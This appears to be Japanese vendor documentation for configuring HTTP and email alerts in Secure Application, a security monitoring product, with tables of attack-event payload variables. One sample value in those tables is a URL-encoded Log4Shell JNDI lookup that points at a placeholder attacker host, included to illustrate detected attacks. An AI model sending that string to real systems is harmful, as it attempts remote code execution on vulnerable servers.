Secure Application を使用したアラート

HTTP アラートの作成

[Alerts] タブでは、電子メールおよび HTTP ベースのアラートを設定できます。Secure Application が新しい攻撃、脆弱性、またはビジネスリスクを検出したときにアラートを受け取るようにアクションを設定できます。

注: [編集(Edit)](管理者またはテナントレベル)権限を持つユーザーのみが [Alerts] にアクセスできます。管理者またはテナントレベルよりも低い権限を持つ RBAC ユーザーはアラートを作成できません。
  1. Secure Application ダッシュボードから、[Alerts] に移動します。
  2. [HTTP] タブから、[+ Add Action] をクリックします。
  3. [Action Name] を入力します。
    [Action Name] では特殊文字は使用しないでください。
  4. [Event Type]:[Vulnerability]、[Business Risk]、または [Attack] を選択します。
  5. [Next] をクリックします。
  6. 次の Action Details を入力します:
    1. Method Type: POST
    2. Encoding:UTF-8
    3. (オプション)[Applications]:このアクションが適用されるアプリケーションをプルダウンリストから最大 100 個選択。リストに入力することで、リストをフィルタリングできます。デフォルトでは、このアクションはすべてのアプリケーションに適用されます。
    4. [Raw URL]:HTTP リクエストの Raw URL を入力します。
  7. [Next] をクリックします。
  8. [Authentication Type] の場合は、次を選択します。
    1. [None]:通信が暗号化されていない場合に選択
    2. [Basic] を選択してユーザー名とパスワードを入力
    3. [Bearer Token] を選択してトークンを入力
  9. [Next] をクリックします。
  10. オプション: (オプション)リクエストのカスタムヘッダーを指定します。
  11. Next をクリックします。
  12. Add Payload をクリックします。

    ペイロードは有効な JSON である必要があります。[Predefined Variables] の内容をコピーして、[Editor] にその変数を貼り付けます。たとえば、[Event Type] に [Attack] を選択した場合、[Add Payload] をクリックしたときに、攻撃イベントに関連する変数を選択できます。

    攻撃変数:

    フィールド 説明 値の例
    $attack.id 攻撃の一意の識別子 "SQL_INJECTION_001"
    $attack.status 攻撃の現在のステータス "ACTIVE""RESOLVED""INVESTIGATING"
    $attack.source 攻撃の送信元または発生元 "External""Internal""Unknown"
    $attack.outcome 攻撃の結果または成果 "BLOCKED""ALLOWED""PARTIALLY_BLOCKED"
    $attack.types 検出された攻撃のタイプ "SQL Injection""XSS""CSRF"
    $attack.eventTrigger 攻撃の検出をトリガーしたイベント "HTTP Request""Database Query"
    $attack.lastDetected 攻撃が最後に検出された時点を示すタイムスタンプ。 "2023-10-15T14:30:00Z"
    $attack.events 攻撃に関連する詳細なイベント。詳細については、以下の「攻撃イベント」の表を参照してください。 攻撃イベントの JSON 配列

    $attack.events には、次の主要なフィールドが含まれています。

    フィールド 説明 値の例
    $attack.events.eventType 攻撃中に検出されたアクティビティのタイプ "SOCKET_RESOLVE"
    $attack.events.attackType 特定の攻撃カテゴリが検出されました "LOG4J"
    $attack.events.timestamp 攻撃イベントが発生した時間 "2025-01-22T23:03:52Z"
    $attack.events.applicationName 攻撃の影響を受けたアプリケーション "ExpoitsTestApp"
    $attack.events.tierName 攻撃の影響を受けた階層 "ExpoitsTestTier"
    $attack.events.blocked 攻撃がブロックされたかどうかを示します "true""false"
    $attack.events.attackOutcome イベントの結果 "EXPLOITED""ATTEMPTED""BLOCKED""OBSERVED""UNKNOWN"
    $attack.events.stackTrace 攻撃の発生源であるスタックトレース "java.lang.SecurityManager.checkConnect(...)"
    $attack.events.clientAddress 要求を開始したクライアントの IP アドレス "127.11.11.1"
    $attack.events.clientPort クライアントで使用されるポート "40758"
    $attack.events.serverAddress 要求を処理するサーバーの IP アドレス "127.12.12.1"
    $attack.events.serverPort サーバーで使用されるポート "8088"
    $attack.events.webTransactionUrl エクスプロイト試行に関与する完全な URL "https://vulnerable.app.com/login?user=%24%7Bjndi%3Aldap%3A%2F%2Fmalicious.attacker.com%2Fa%7D"
    $attack.events.maliciousIpOut イベント中に接続されたアウトバウンド IP アドレス "192.0.2.123"
    $attack.events.maliciousIpSourceOut 悪意のある IP が一致する送信元(存在する場合) "10.1.2.45"
    $attack.events.detailJson 構造化された技術メタデータ(クラス、ソケット、メソッドなど) {"classname": "java.net.SocketPermission", ...}

    攻撃イベントが脆弱性によって引き起こされた場合、$attack.events には次の追加フィールドが含まれる場合があります。

    表 1. 脆弱性に関連した攻撃イベントのフィールド
    フィールド 説明 値の例
    $attack.events.vulnerableMethod 脆弱性がトリガーされたメソッド "org.apache.logging.log4j.core.lookup.JndiLookup.lookup(Thread.java:234)"
    $attack.events.matchedCveName 一致した CVE の名前 "CVE-2021-44228"
    $attack.events.cveId 一致した CVE の内部識別子
    $attack.events.vulnerabilityInfo.cvePublishDate CVE 公開日 "2021-12-10T10:10:01Z"
    $attack.events.vulnerabilityInfo.cvssScore CVSS リスクスコア(0 〜 10) 10
    $attack.events.vulnerabilityInfo.cvssSeverity CVSS に基づくシビラティレベル "CRITICAL"
    $attack.events.vulnerabilityInfo.library 関連する脆弱なライブラリ "org.apache.logging.log4j:log4j-core"
    $attack.events.vulnerabilityInfo.title 人間が判読可能な脆弱性についての説明 "Remote Code Execution (RCE)"
    $attack.events.vulnerabilityInfo.kennaScore Kenna Security のリスクスコア 100
    $attack.events.vulnerabilityInfo.kennaActiveInternetBreach 脆弱性が積極的に不正利用されることが知られているかどうか truefalse
    $attack.events.vulnerabilityInfo.kennaEasilyExploitable 脆弱性のエクスプロイトが容易かどうか truefalse
    $attack.events.vulnerabilityInfo.kennaPredictedExploitable 予測モデルによるエクスプロイト可能性のアセスメント truefalse
    $attack.events.vulnerabilityInfo.kennaPopularTarget 組織全体でよく狙われるターゲットかどうか truefalse
    ヒント:

    事前定義の変数 $attack.events を選択して、攻撃に関連付けられた脆弱性に関する詳細をペイロードに含めます。

    事前定義の変数 $attack.events を選択して、256 行のスタックトレースをペイロードに含めます。

  13. 次の情報を確認してレビューします。[cURL]、[General Information]、[Actions]、[Security]、[Custom Headers]、および [Payload]
    ServiceNow のペイロードの例:

    限られたアプリケーションにのみ適用されるアクションの例:

  14. [Save] をクリックします。
[Save] をクリックすると、デフォルトの [Rules] が自動的に生成されます。ルールを確認するには、[Rule] タブをクリックします。このアクションの適用先アプリケーションを指定した場合、これらのアプリケーションが [Rules] タブの [Application] 列に表示されます。

電子メールアラートの作成

また、電子メールの通告ごとに 100 以下の脆弱性、ビジネスリスク、または攻撃を表示することもできます。100 を超える脆弱性、ビジネスリスク、または攻撃を表示するには、UI にサインインします。

  1. Secure Application ダッシュボードから、[Alerts] に移動します。
  2. [Email] タブをクリックしてから、[+ Add Action] をクリックします。
  3. [Action Name] を入力します。[Action Name] では特殊文字は使用しないでください。
  4. [Event Type]:[Vulnerability]、[Business Risk]、または [Attack] を選択します。
  5. [Next] をクリックします。
  6. 次の [Action Details] を入力します。
    1. オプション: エクスプロイト攻撃について電子メールアラートを受信する場合は、[Notify directly in case of an exploited attack] を選択します。
    2. Email
    3. Email Digest
  7. [Next] をクリックします。
  8. レポートするフィールドを選択して、[Next] をクリックします。
  9. [General Information]、[Actions]、[Fields.] の情報を確認してレビューします。
  10. [Save] をクリックします。
[Save] をクリックすると、デフォルトの [ Rules] が自動的に生成されます。